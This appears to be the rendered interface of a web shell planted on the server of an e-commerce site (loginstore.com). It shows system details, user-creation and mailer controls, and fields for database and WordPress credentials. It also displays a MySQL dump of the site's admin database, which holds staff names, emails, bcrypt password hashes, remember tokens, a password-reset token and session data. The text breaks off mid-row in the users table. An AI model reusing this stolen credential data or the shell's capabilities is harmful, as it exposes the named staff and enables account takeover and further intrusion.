System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxrwxrwx
]
:
/
root
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
ybgifvde_admin.sql
-- MySQL dump 10.13 Distrib 8.0.45, for Linux (x86_64) -- -- Host: localhost Database: ybgifvde_admin -- ------------------------------------------------------ -- Server version 8.0.45-0ubuntu0.22.04.1 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!50503 SET NAMES utf8mb4 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `accion` -- DROP TABLE IF EXISTS `accion`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `accion` ( `accion_id` int NOT NULL AUTO_INCREMENT, `accion_name` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `accion_enabled` char(1) COLLATE utf8mb4_unicode_ci DEFAULT 'S', `accion_created` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, `accion_updated` datetime DEFAULT NULL, PRIMARY KEY (`accion_id`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `accion` -- LOCK TABLES `accion` WRITE; /*!40000 ALTER TABLE `accion` DISABLE KEYS */; INSERT INTO `accion` VALUES (1,'Grabar','S','2025-11-07 17:15:14','2025-11-07 22:14:56'),(2,'Editar','S','2025-11-07 17:15:14','2025-11-07 22:14:56'),(3,'Eliminar','S','2025-11-07 17:15:42','2025-11-07 22:15:28'),(4,'Visualizar','S','2025-11-07 17:15:42','2025-11-07 22:15:28'),(5,'Galeria Productos','S','2025-11-07 17:16:06','2025-11-07 22:15:49'),(6,'Productos PDF','S','2025-11-07 17:16:06','2025-11-07 22:15:49'); /*!40000 ALTER TABLE `accion` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache` -- DROP TABLE IF EXISTS `cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `cache` ( `key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `value` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL, `expiration` int NOT NULL, PRIMARY KEY (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache` -- LOCK TABLES `cache` WRITE; /*!40000 ALTER TABLE `cache` DISABLE KEYS */; INSERT INTO `cache` VALUES ('alex.lozano@deltron.com.pe|10.10.0.200','i:3;',1769200249),('alex.lozano@deltron.com.pe|10.10.0.200:timer','i:1769200249;',1769200249),('wanderley.fasabi@malldigitaltec.com.pe|10.10.0.200','i:1;',1769200250),('wanderley.fasabi@malldigitaltec.com.pe|10.10.0.200:timer','i:1769200250;',1769200250); /*!40000 ALTER TABLE `cache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_locks` -- DROP TABLE IF EXISTS `cache_locks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `cache_locks` ( `key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `owner` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `expiration` int NOT NULL, PRIMARY KEY (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_locks` -- LOCK TABLES `cache_locks` WRITE; /*!40000 ALTER TABLE `cache_locks` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_locks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `failed_jobs` -- DROP TABLE IF EXISTS `failed_jobs`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `failed_jobs` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `uuid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `connection` text COLLATE utf8mb4_unicode_ci NOT NULL, `queue` text COLLATE utf8mb4_unicode_ci NOT NULL, `payload` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `exception` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `failed_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`), UNIQUE KEY `failed_jobs_uuid_unique` (`uuid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `failed_jobs` -- LOCK TABLES `failed_jobs` WRITE; /*!40000 ALTER TABLE `failed_jobs` DISABLE KEYS */; /*!40000 ALTER TABLE `failed_jobs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `job_batches` -- DROP TABLE IF EXISTS `job_batches`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `job_batches` ( `id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `total_jobs` int NOT NULL, `pending_jobs` int NOT NULL, `failed_jobs` int NOT NULL, `failed_job_ids` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `options` mediumtext COLLATE utf8mb4_unicode_ci, `cancelled_at` int DEFAULT NULL, `created_at` int NOT NULL, `finished_at` int DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `job_batches` -- LOCK TABLES `job_batches` WRITE; /*!40000 ALTER TABLE `job_batches` DISABLE KEYS */; /*!40000 ALTER TABLE `job_batches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jobs` -- DROP TABLE IF EXISTS `jobs`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `jobs` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `queue` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `payload` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `attempts` tinyint unsigned NOT NULL, `reserved_at` int unsigned DEFAULT NULL, `available_at` int unsigned NOT NULL, `created_at` int unsigned NOT NULL, PRIMARY KEY (`id`), KEY `jobs_queue_index` (`queue`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jobs` -- LOCK TABLES `jobs` WRITE; /*!40000 ALTER TABLE `jobs` DISABLE KEYS */; /*!40000 ALTER TABLE `jobs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `migrations` -- DROP TABLE IF EXISTS `migrations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `migrations` ( `id` int unsigned NOT NULL AUTO_INCREMENT, `migration` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `batch` int NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `migrations` -- LOCK TABLES `migrations` WRITE; /*!40000 ALTER TABLE `migrations` DISABLE KEYS */; INSERT INTO `migrations` VALUES (1,'0001_01_01_000000_create_users_table',1),(2,'0001_01_01_000001_create_cache_table',1),(3,'0001_01_01_000002_create_jobs_table',1),(4,'2024_11_20_170640_modulos',1); /*!40000 ALTER TABLE `migrations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `modulo_accion` -- DROP TABLE IF EXISTS `modulo_accion`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `modulo_accion` ( `modulo_accion_id` int NOT NULL AUTO_INCREMENT, `modulos_id` int DEFAULT NULL, `accion_id` int DEFAULT NULL, `modulo_accion_enabled` char(1) COLLATE utf8mb4_unicode_ci DEFAULT 'S', `modulo_accion_created` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, `modulo_accion_updated` datetime DEFAULT NULL, PRIMARY KEY (`modulo_accion_id`) ) ENGINE=InnoDB AUTO_INCREMENT=73 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `modulo_accion` -- LOCK TABLES `modulo_accion` WRITE; /*!40000 ALTER TABLE `modulo_accion` DISABLE KEYS */; INSERT INTO `modulo_accion` VALUES (1,2,1,'S','2025-05-10 17:06:46',NULL),(2,2,2,'S','2025-05-10 17:06:49',NULL),(3,2,3,'S','2025-05-10 17:06:59',NULL),(4,3,1,'S','2025-05-14 16:54:12',NULL),(5,3,2,'S','2025-05-14 16:54:22',NULL),(6,3,3,'S','2025-05-14 16:54:27',NULL),(7,4,1,'S','2025-05-14 16:54:55',NULL),(8,4,2,'S','2025-05-14 16:54:55',NULL),(9,4,3,'S','2025-05-14 16:54:55',NULL),(10,5,1,'S','2025-05-14 16:56:07',NULL),(11,5,2,'S','2025-05-14 16:56:07',NULL),(12,5,3,'S','2025-05-14 16:56:07',NULL),(13,5,4,'S','2025-05-14 16:56:07',NULL),(14,5,5,'S','2025-05-14 16:56:14',NULL),(15,5,6,'S','2025-05-14 16:56:14',NULL),(30,6,1,'S','2025-05-14 16:58:23',NULL),(31,6,2,'S','2025-05-14 16:58:23',NULL),(32,6,3,'S','2025-05-14 16:58:23',NULL),(33,7,1,'S','2025-05-14 16:58:47',NULL),(34,7,2,'S','2025-05-14 16:58:47',NULL),(35,7,3,'S','2025-05-14 16:58:47',NULL),(36,12,1,'S','2025-05-14 17:00:43',NULL),(37,15,4,'S','2025-05-14 17:01:04',NULL),(38,24,1,'S','2025-05-14 17:02:25',NULL),(39,24,2,'S','2025-05-14 17:02:25',NULL),(40,24,3,'S','2025-05-14 17:02:25',NULL),(41,24,4,'S','2025-05-14 17:02:25',NULL),(42,26,1,'S','2025-05-14 17:02:47',NULL),(43,26,2,'S','2025-05-14 17:02:47',NULL),(44,26,3,'S','2025-05-14 17:02:47',NULL),(45,27,1,'S','2025-05-14 17:04:13',NULL),(46,27,2,'S','2025-05-14 17:04:13',NULL),(47,27,3,'S','2025-05-14 17:04:13',NULL),(48,17,1,'S','2025-05-14 17:05:17',NULL),(49,17,2,'S','2025-05-14 17:05:17',NULL),(50,17,3,'S','2025-05-14 17:05:17',NULL),(51,18,1,'S','2025-05-14 17:05:17',NULL),(52,18,2,'S','2025-05-14 17:05:17',NULL),(53,18,3,'S','2025-05-14 17:05:17',NULL),(54,29,1,'S','2025-05-14 17:06:02',NULL),(55,29,2,'S','2025-05-14 17:06:03',NULL),(56,29,3,'S','2025-05-14 17:06:03',NULL),(57,30,1,'S','2025-05-14 17:06:26',NULL),(58,34,1,'S','2025-05-14 17:07:08',NULL),(59,34,2,'S','2025-05-14 17:07:08',NULL),(60,34,3,'S','2025-05-14 17:07:08',NULL),(61,36,1,'S','2025-05-14 17:07:26',NULL),(62,36,2,'S','2025-05-14 17:07:26',NULL),(63,36,3,'S','2025-05-14 17:07:26',NULL),(64,37,1,'S','2025-05-14 17:08:07',NULL),(65,37,2,'S','2025-05-14 17:08:07',NULL),(66,37,3,'S','2025-05-14 17:08:07',NULL),(67,37,4,'S','2025-05-14 17:08:07',NULL),(68,38,1,'S','2025-05-14 17:08:38',NULL),(69,38,2,'S','2025-05-14 17:08:38',NULL),(70,38,3,'S','2025-05-14 17:08:38',NULL),(71,35,2,'S','2025-05-14 17:09:18',NULL),(72,32,1,'S','2025-05-14 17:09:42',NULL); /*!40000 ALTER TABLE `modulo_accion` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `modulos` -- DROP TABLE IF EXISTS `modulos`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `modulos` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `nombre` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `route` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `acciones` text COLLATE utf8mb4_unicode_ci, `parent_id` int DEFAULT '0', `enabled` char(1) COLLATE utf8mb4_unicode_ci DEFAULT 'S', `created_at` timestamp NULL DEFAULT CURRENT_TIMESTAMP, `updated_at` timestamp NULL DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `modulos` -- LOCK TABLES `modulos` WRITE; /*!40000 ALTER TABLE `modulos` DISABLE KEYS */; INSERT INTO `modulos` VALUES (1,'Catalogo','',NULL,0,'S','2025-01-03 03:23:26',NULL),(2,'Categorias','categorias','1,2,3',1,'S','2025-01-03 03:07:13',NULL),(3,'Subcategorias','subcategorias','1,2,3',1,'S','2025-01-03 03:11:15',NULL),(4,'Marcas','marcas','1,2,3',1,'S','2025-01-03 03:12:58',NULL),(5,'Productos','productos','1,2,3',1,'S','2025-01-03 03:17:43',NULL),(6,'Almacenes','almacen','1,2,3',1,'S','2025-01-14 01:46:15',NULL),(7,'Stock','stock-almacen','1,2,3',1,'S','2025-01-03 03:20:37',NULL),(8,'Configuración','',NULL,1,'S','2025-01-03 03:23:26',NULL),(9,'Plantilla de Producto','atributo','1,2,3',8,'N','2025-01-31 01:11:00',NULL),(10,'Item Atributo','item-atributo','1,2,3',8,'N','2025-01-31 02:54:41',NULL),(11,'Falabella','',NULL,1,'S','2025-01-03 03:23:26',NULL),(12,'Categorias','categorias-saga','1,2,3',11,'S','2025-01-03 03:21:30',NULL),(13,'Productos','transferir-item-saga','1,2,3',11,'N','2025-01-25 21:52:17',NULL),(14,'Ventas','',NULL,0,'S','2025-01-03 03:23:26',NULL),(15,'Pedidos','pedidos','1,2,3',14,'S','2025-01-03 03:18:21',NULL),(16,'Clientes','clientes','1,2,3',14,'S','2025-01-03 03:18:21',NULL),(17,'Oferta','ofertas','1,2,3',14,'S','2025-01-03 03:15:58',NULL),(18,'Precios','precios-marca','1,2,3',14,'S','2025-02-01 20:37:01',NULL),(19,'Reportes','',NULL,0,'S','2025-01-09 02:19:47',NULL),(20,'Categorias Más Consultadas','categorias-buscados','1,2,3',19,'S','2025-01-09 20:17:51',NULL),(21,'SubCategorias Más Consultadas','subcategorias-buscados','1,2,3',19,'S','2025-01-09 20:17:51',NULL),(22,'Productos Más Consultados','item-buscados','1,2,3',19,'S','2025-01-09 02:20:28',NULL),(23,'Soporte y Reclamos','',NULL,0,'S','2025-01-09 02:19:47',NULL),(24,'Libro Reclamaciones','libro-reclamaciones','1,2,3',23,'S','2025-01-03 03:23:14',NULL),(25,'Sistema','',NULL,0,'S','2025-01-09 02:19:47',NULL),(26,'Usuarios','registrar-usuario','1,2,3',25,'S','2025-01-03 03:19:40',NULL),(27,'Jefes de Marca','jefes-marca','1,2,3',25,'N','2025-01-03 03:19:40',NULL),(28,'Configuración','',NULL,25,'S','2025-01-03 03:23:26',NULL),(29,'Parametros del Sistema','parametros-sistema','1,2,3',28,'S','2025-01-11 22:13:34',NULL),(30,'Menu Sistema','menu-login','1,2,3',28,'S','2025-01-03 03:22:08',NULL),(31,'Registro de Errores','configuracion-sistema','1,2,3',25,'S','2025-01-16 21:50:00',NULL),(32,'Saga Atributos','saga-atributo','1,2,3',11,'S','2025-03-04 21:40:29',NULL),(33,'Trend','trend','1,2,3',19,'S','2025-03-12 17:43:33',NULL),(34,'Packs','packs','1,2,3',14,'S','2025-03-12 17:43:33',NULL),(35,'Catalogo de Productos','saga-productos','1,2,3',11,'S','2025-03-29 16:20:34',NULL),(36,'Slider Web','slider-web','1,2,3',28,'S','2025-04-16 14:34:11',NULL),(37,'Tamaño de Paquetes','tamanio-paquetes','1,2,3',11,'S','2025-04-25 22:54:04',NULL),(38,'Acceso por Marca','acceso-marca','1,2,3',8,'S','2025-05-02 20:29:18',NULL),(39,'Cupon','cupon','1,2,3',28,'S','2025-08-29 15:01:26',NULL); /*!40000 ALTER TABLE `modulos` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `password_reset_tokens` -- DROP TABLE IF EXISTS `password_reset_tokens`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `password_reset_tokens` ( `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `token` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `created_at` timestamp NULL DEFAULT NULL, PRIMARY KEY (`email`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `password_reset_tokens` -- LOCK TABLES `password_reset_tokens` WRITE; /*!40000 ALTER TABLE `password_reset_tokens` DISABLE KEYS */; INSERT INTO `password_reset_tokens` VALUES ('luigi.loo@malldigitaltec.com.pe','$2a$12$OolkLbqeVHksQjobFWNWjeKShxDVQfs74dyEnj2Zd6MrNNgneaAXu','2025-03-25 21:03:47'); /*!40000 ALTER TABLE `password_reset_tokens` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `sessions` -- DROP TABLE IF EXISTS `sessions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `sessions` ( `id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `user_id` bigint unsigned DEFAULT NULL, `ip_address` varchar(45) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `user_agent` text COLLATE utf8mb4_unicode_ci, `payload` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `last_activity` int NOT NULL, PRIMARY KEY (`id`), KEY `sessions_user_id_index` (`user_id`), KEY `sessions_last_activity_index` (`last_activity`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `sessions` -- LOCK TABLES `sessions` WRITE; /*!40000 ALTER TABLE `sessions` DISABLE KEYS */; INSERT INTO `sessions` VALUES ('m4eu7SvDPzFrTSlEyOL523Sg1Ydn6fqnB6x86zJM',10,'10.10.0.200','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36','YTo1OntzOjY6Il90b2tlbiI7czo0MDoiSU5YSFJjYTR6MFpDc2JRUjlMU0RJS2NOUXFEZnlIelNwT2dUS25RZiI7czo5OiJfcHJldmlvdXMiO2E6MTp7czozOiJ1cmwiO3M6MzQ6Imh0dHA6Ly8xMC4xMC4wLjczL2FkbWluL3NsaWRlci13ZWIiO31zOjY6Il9mbGFzaCI7YToyOntzOjM6Im9sZCI7YTowOnt9czozOiJuZXciO2E6MDp7fX1zOjUwOiJsb2dpbl93ZWJfNTliYTM2YWRkYzJiMmY5NDAxNTgwZjAxNGM3ZjU4ZWE0ZTMwOTg5ZCI7aToxMDtzOjE4OiJmaWx0ZXJzX3NsaWRlci13ZWIiO2E6NTp7czoxMjoiYmVnaW5fc2VhcmNoIjtOO3M6MTA6ImVuZF9zZWFyY2giO047czoxMjoidGl0bGVfc2VhcmNoIjtOO3M6MTM6ImRldmljZV9zZWFyY2giO3M6MToiRCI7czoxNDoiZW5hYmxlZF9zZWFyY2giO3M6MToiUyI7fX0=',1772830914),('pC60zgEcMPEuTGI9gT3sJ9RDbHbuGQkR18k5J1hy',NULL,'10.10.0.71','Turaco Labs ThreatView Security Auditor (threatview.app)','YTozOntzOjY6Il90b2tlbiI7czo0MDoic2ppanhEYXZ0dVlGME9nZ1hkbkdlVU44aWNnUkVWald6aHJCOGMwQyI7czo5OiJfcHJldmlvdXMiO2E6MTp7czozOiJ1cmwiO3M6MzE6Imh0dHA6Ly93d3cubG9naW5zdG9yZS5jb20vYWRtaW4iO31zOjY6Il9mbGFzaCI7YToyOntzOjM6Im9sZCI7YTowOnt9czozOiJuZXciO2E6MDp7fX19',1772852104),('RxdXl43xzVTxIUVUerHr1mZjsTzqMgC9guRtUEPK',2,'10.10.0.115','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0','YTo0OntzOjY6Il90b2tlbiI7czo0MDoiY3hOUzRxZkNPSHEzTEZUZ0UzdjlDY2VDWUFLZ2p2NVRFN2hia2U5ZCI7czo1MDoibG9naW5fd2ViXzU5YmEzNmFkZGMyYjJmOTQwMTU4MGYwMTRjN2Y1OGVhNGUzMDk4OWQiO2k6MjtzOjk6Il9wcmV2aW91cyI7YToxOntzOjM6InVybCI7czozNDoiaHR0cDovLzEwLjEwLjAuNzMvYWRtaW4vbWVudS1sb2dpbiI7fXM6NjoiX2ZsYXNoIjthOjI6e3M6Mzoib2xkIjthOjA6e31zOjM6Im5ldyI7YTowOnt9fX0=',1772834505),('VNPFPzdLsZp99czpF1p3K3qIG0PoXKHy0XESTn37',NULL,'10.10.0.71','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','YTozOntzOjY6Il90b2tlbiI7czo0MDoiajhqQnBtQ29TZ0lobnlzaW0zNzJ5cEhUV2pQMjk0V0ZjWEh1N2J0dSI7czo5OiJfcHJldmlvdXMiO2E6MTp7czozOiJ1cmwiO3M6MzE6Imh0dHA6Ly93d3cubG9naW5zdG9yZS5jb20vYWRtaW4iO31zOjY6Il9mbGFzaCI7YToyOntzOjM6Im9sZCI7YTowOnt9czozOiJuZXciO2E6MDp7fX19',1772818564),('VQ646Fkrks66N11wpK4MWaBaCePA4Nk0Gi5oWEpN',3,'10.10.0.115','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36','YTo1OntzOjY6Il90b2tlbiI7czo0MDoiSWljdkEweEs0cE9nN3RyS0E5QmhWTUcyS0g3VXpKdkpvZzZJWVJlSiI7czo5OiJfcHJldmlvdXMiO2E6MTp7czozOiJ1cmwiO3M6MzM6Imh0dHA6Ly8xMC4xMC4wLjczL2FkbWluL2Rhc2hib2FyZCI7fXM6NjoiX2ZsYXNoIjthOjI6e3M6Mzoib2xkIjthOjA6e31zOjM6Im5ldyI7YTowOnt9fXM6NTA6ImxvZ2luX3dlYl81OWJhMzZhZGRjMmIyZjk0MDE1ODBmMDE0YzdmNThlYTRlMzA5ODlkIjtpOjM7czoxNToiZmlsdGVyc19wZWRpZG9zIjthOjU6e3M6MTk6ImZlY2hhX2luaWNpb19zZWFyY2giO047czoxNjoiZmVjaGFfZmluX3NlYXJjaCI7TjtzOjE1OiJucm9vcmRlbl9zZWFyY2giO3M6OToiNDAwMDAyNjI1IjtzOjIzOiJudW1lcm9fZG9jdW1lbnRvX3NlYXJjaCI7TjtzOjIwOiJlc3RhZG9fcGVkaWRvX3NlYXJjaCI7Tjt9fQ==',1772811425),('W9xjLFEN5vdGHd30nHyqLMzr2XioPrEVAQXO5lDc',NULL,'10.10.0.71','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','YTozOntzOjY6Il90b2tlbiI7czo0MDoiOGZaamg2Q2k5WmNHaWl5cVd3aGEzdnNrdkF6dklOQXNJYkc0dmdaTyI7czo5OiJfcHJldmlvdXMiO2E6MTp7czozOiJ1cmwiO3M6MzE6Imh0dHA6Ly93d3cubG9naW5zdG9yZS5jb20vYWRtaW4iO31zOjY6Il9mbGFzaCI7YToyOntzOjM6Im9sZCI7YTowOnt9czozOiJuZXciO2E6MDp7fX19',1772818608); /*!40000 ALTER TABLE `sessions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user_brands` -- DROP TABLE IF EXISTS `user_brands`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `user_brands` ( `user_brand_id` int NOT NULL AUTO_INCREMENT, `user_id` int NOT NULL, `brand_id` int NOT NULL, `user_brand_enabled` char(1) DEFAULT 'S', `user_brand_created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `user_brand_updated` datetime DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP, PRIMARY KEY (`user_brand_id`), UNIQUE KEY `user_id` (`user_id`,`brand_id`), KEY `brand_id` (`brand_id`), KEY `user_id_2` (`user_id`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user_brands` -- LOCK TABLES `user_brands` WRITE; /*!40000 ALTER TABLE `user_brands` DISABLE KEYS */; /*!40000 ALTER TABLE `user_brands` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `users` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `email_verified_at` timestamp NULL DEFAULT NULL, `password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL, `admin` char(1) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'N', `permisos` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL, `remember_token` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `enabled` char(1) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'S', `created_at` timestamp NULL DEFAULT NULL, `updated_at` timestamp NULL DEFAULT NULL, PRIMARY KEY (`id`), UNIQUE KEY `users_email_unique` (`email`) ) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `users` -- LOCK TABLES `users` WRITE; /*!40000 ALTER TABLE `users` DISABLE KEYS */; INSERT INTO `users` VALUES (1,'Luigui Loo','luigi.loo@malldigitaltec.com.pe',NULL,'$2y$10$MSZi5WG6RMLtpnwOQxAMDOo0FU.O9cgzYJU7BQSFaZfq7IC/EZir.','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"12\",\"15\",\"16\",\"17\",\"18\",\"20\",\"21\",\"22\",\"24\",\"26\",\"29\",\"30\",\"31\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"]','JLU4NxxYKIQdY0mEbrrbQZXkFS4UAa40FRqlrxS1PTzXMXmPg1IkxuzCwLYZ','S','2025-01-03 02:44:21','2025-07-25 19:25:16'),(2,'Alex Lozano','alex.lozano@deltron.com.pe',NULL,'$2y$12$RiAr8Vmhb3wOldsp75VGlubUKbrophQ7Bd2ANg3wKpx3r9XMmA/2q','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"12\",\"15\",\"16\",\"17\",\"18\",\"20\",\"21\",\"22\",\"24\",\"26\",\"29\",\"30\",\"31\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"]','Ih423RRJJoh0skLQXFcU2yRb69tfMfmHJbuuoPK2q8vK8SHbmDbrccjecHRt','S','2025-01-03 03:31:52','2025-01-03 03:31:52'),(3,'Wanderley Fasabi','wanderley.fasabi@malldigitaltec.com.pe',NULL,'$2y$12$MnH/faNBNCm7A6dF1.3siOBFxviNhVgwwy3ZA.VZbMH6POvPjVWEe','S','[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"12\",\"15\",\"17\",\"18\",\"24\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"]','qdI93NwwDAs9VSAsRAvddcWkYricWZJ8Ir4AQxyqnCxQQwVefS8dVyQ8ohYR','S','2025-01-03 03:33:31','2025-01-03 03:33:31'),(4,'Francis 